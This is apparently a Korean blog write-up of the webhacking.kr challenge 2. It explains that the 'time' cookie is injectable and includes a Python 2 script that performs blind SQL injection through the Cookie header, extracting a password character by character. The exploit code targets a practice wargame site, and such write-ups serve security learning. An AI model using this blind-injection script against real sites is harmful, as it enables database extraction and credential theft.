위 pdf 내용을 읽어 보셔도 잘 이해가 안 가시는 분들이 많이 계신거 같네요...
SQL Injection vector를 못 찾겠다는 댓글이 많은데...
우선, 쿠키값을 편집 할 수 있어야 합니다.
참고로, 저는 크롬에서 "Edit This Cookie"라는 확장프로그램을 사용하고 있는데요...
그림은 아래와 같습니다.
위 그림에서 보듯이 쿠키 값중에 time이라는 변수에 1361812648이라는 값이 들어있죠? 이것이 현재시간을 나타내는 값입니다. 이 부분 뒤에 Query를 삽입 하면 됩니다.
죄송하지만, pdf 풀이집을 보셔도... 쿠키 편집 화면을 보셔도... 그래도 이해가 안가신다면...
python으로 blind injection을 거는 소스를 추가 합니다...
import re,urllib,urllib2
#fw = urllib.urlopen("http://webhacking.kr/challenge/web/web-02/")
#read = fw.read()
password=""
for j in range(1,100):
print "%d" %j
for i in range(33,126):
url="http://webhacking.kr/challenge/web/web-02/"
req=urllib2.Request(url)
req.add_header('Cookie',"time=1337906400 and (select ascii(substring(password,%d,1)) from FreeB0aRd)=%d; PHPSESSID=5042bff0afa5d30839aac4db01016d6e; notice=yes" %(j,i))
read=urllib2.urlopen(req).read()
ok = re.findall("<!--2070-01-01 09:00:01--></td>",read)
if ok:
password=password+chr(i)
print password
break
'Wargame' 카테고리의 다른 글
suninatas.com 8번 문제 풀이 (1) | 2014.09.23 |
---|---|
추천 워게임 사이트 써니나타스 (0) | 2013.04.18 |
webhacking.kr 55번 문제 풀이 (0) | 2013.03.04 |
webhacking.kr 56번 문제 풀이 (4) | 2013.03.04 |
webhacking.kr 40번 문제 풀이 (6) | 2013.03.04 |